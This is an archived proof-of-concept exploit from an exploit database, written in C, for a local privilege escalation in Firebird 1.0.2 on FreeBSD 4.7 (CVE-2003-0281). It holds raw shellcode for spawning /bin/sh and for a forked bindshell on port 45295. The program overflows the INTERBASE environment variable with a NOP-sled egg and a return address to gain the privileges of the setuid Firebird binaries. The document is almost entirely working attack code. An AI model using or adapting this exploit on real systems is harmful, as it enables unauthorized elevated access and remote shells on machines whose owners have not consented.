Firebird 1.0.2 (FreeBSD 4.7-RELEASE) - Local Privilege Escalation - CVE-2003-0281/2002-2087

1. /* DSR-firebird.c
2.    -------------------------------
3. Tested on: Firebird 1.0.2 FreeBSD 4.7-RELEASE
4. This is Proof Of concept code.
5. bash-2.05a$ ./DSR-firebird
6. ( ( Firebird-1.0.2 Local exploit for Freebsd 4.7 ) )
7. ( (                           by - bob@dtors.net ) )
8. ----------------------------------------------------
9.  
10. Usage: ./DSR-firebird <target#>
11. Targets:
12. 1. [0xbfbff75d] - gds_inet_server
13. 2. [0xbfbff75c] - gds_lock_mgr
14. 3. [0xbfbff75e] - gds_drop
15.  
16. bash-2.05a$
17. */
18.  
19.  
20. #include <stdio.h>
21. #include <stdlib.h>
22. #include <string.h>
23. #define LOCK    "/usr/local/firebird/bin/gds_lock_mgr"
24. #define DROP    "/usr/local/firebird/bin/gds_drop"
25. #define INET    "/usr/local/firebird/bin/gds_inet_server"
26. #define LEN     1056
27.  
28. char dropcode[]=
29.         "\x31\xc0\x50\x6a\x5a\x53\xb0\x17\xcd\x80"
30.         "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
31.       "\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0"
32.       "\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
33.  
34. char inetcode[]=
35.         "\x31\xc0\x50\x6a\x5a\x53\xb0\x17\xcd\x80"
36.         "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
37.       "\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0"
38.       "\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
39.  
40.                            
41.  
42. char lockcode[]=
43.     "\x31\xc0\x31\xdb\xb0\x02\xcd\x80"
44.     "\x39\xc3\x75\x06\x31\xc0\xb0\x01\xcd\x80"
45.     "\x31\xc0\x50\x6a\x5a\x53\xb0\x17\xcd\x80" //setuid[firebird] by
46. bob
47.     "\x31\xc0\x31\xdb\x53\xb3\x06\x53" //fork() bindshell by eSDee
48.     "\xb3\x01\x53\xb3\x02\x53\x54\xb0"
49.     "\x61\xcd\x80\x89\xc7\x31\xc0\x50"
50.     "\x50\x50\x66\x68\xb0\xef\xb7\x02"
51.       "\x66\x53\x89\xe1\x31\xdb\xb3\x10"
52.       "\x53\x51\x57\x50\xb0\x68\xcd\x80"
53.       "\x31\xdb\x39\xc3\x74\x06\x31\xc0"
54.       "\xb0\x01\xcd\x80\x31\xc0\x50\x57"
55.       "\x50\xb0\x6a\xcd\x80\x31\xc0\x31"
56.       "\xdb\x50\x89\xe1\xb3\x01\x53\x89"
57.       "\xe2\x50\x51\x52\xb3\x14\x53\x50"
58.       "\xb0\x2e\xcd\x80\x31\xc0\x50\x50"
59.       "\x57\x50\xb0\x1e\xcd\x80\x89\xc6"
60.       "\x31\xc0\x31\xdb\xb0\x02\xcd\x80"
61.       "\x39\xc3\x75\x44\x31\xc0\x57\x50"
62.       "\xb0\x06\xcd\x80\x31\xc0\x50\x56"
63.       "\x50\xb0\x5a\xcd\x80\x31\xc0\x31"
64.       "\xdb\x43\x53\x56\x50\xb0\x5a\xcd"
65.       "\x80\x31\xc0\x43\x53\x56\x50\xb0"
66.       "\x5a\xcd\x80\x31\xc0\x50\x68\x2f"
67.       "\x2f\x73\x68\x68\x2f\x62\x69\x6e"
68.       "\x89\xe3\x50\x54\x53\x50\xb0\x3b"
69.       "\xcd\x80\x31\xc0\xb0\x01\xcd\x80"
70.       "\x31\xc0\x56\x50\xb0\x06\xcd\x80"
71.       "\xeb\x9a";
72.  
73. char *decide(char *string)
74. {
75.     if(!(strcmp(string, "1")))
76.       return((char *)&inetcode);
77.     if(!(strcmp(string, "2")))
78.       return((char *)&lockcode);
79.     if(!(strcmp(string, "3")))
80.       return((char *)&dropcode);
81.     exit(0);
82. }
83.  
84. int main(int argc, char **argv)
85. {
86.    
87.     unsigned long ret = 0xbfbff743;
88.      
89.     char *selectcode;
90.     char buffer[LEN];
91.     char egg[1024];
92.     char *ptr;
93.     int i=0;
94.  
95.  
96.  
97.     if(argc < 2)
98.     {
99.         printf("( ( Firebird-1.0.2 Local exploit for Freebsd
100. 4.7 ) )\n");
101.         printf("( (                           by -
102. bob@dtors.net ) )\n");
103.         printf("---------------------------------------------------
104. -\n\n");
105.         printf("Usage: %s <target#> \n", argv[0]);
106.         printf("Targets:\n");
107.         printf("1. [0xbfbff743] - gds_inet_server\n");
108.         printf("2. [0xbfbff743] - gds_lock_mgr\n");
109.         printf("3. [0xbfbff743] - gds_drop\n");
110.         printf("\nwww.dtors.net\n");
111.         exit(0);
112.     }
113.  
114.     selectcode = (char *)decide(argv[1]);
115.     memset(buffer, 0x41, sizeof(buffer));
116.  
117.         ptr = egg;
118.  
119.         for (i = 0; i < 1024 - strlen(selectcode) -1; i++) *(ptr++) = 0x90;
120.         for (i = 0; i < strlen(selectcode); i++) *(ptr++) = selectcode[i];
121.         egg[1024 - 1] = '\0';
122.  
123.         memcpy(egg,"EGG=",4);
124.         putenv(egg);
125.  
126.         memcpy(&buffer[1052],(char *)&ret,4);
127.         buffer[1056] = 0;
128.  
129.         setenv("INTERBASE", buffer, 1);
130.  
131.         fprintf(stdout, "Return Address: 0x%x\n", ret);
132.         fprintf(stdout, "Buffer Size: %d\n", LEN);
133.         fprintf(stdout, "Setuid [90]\n");
134.  
135. if(selectcode == (char *)&inetcode)
136.   {
137.     execl(INET, INET, NULL);
138.     return 0;
139.    }
140.  
141. if(selectcode == (char *)&lockcode)
142.   {
143.     printf("\nShell is on port 45295\nExploit will hang!\n");
144.     execl(LOCK, LOCK, NULL);
145.     return 0;
146.    }
147.  
148. if(selectcode == (char *)&dropcode)
149.   {
150.     execl(DROP, DROP, NULL);
151.     return 0;
152.    }
153.  
154.    
155.     return 0;
156. }
157.  
158.  
159. // milw0rm.com [2003-05-12]
160.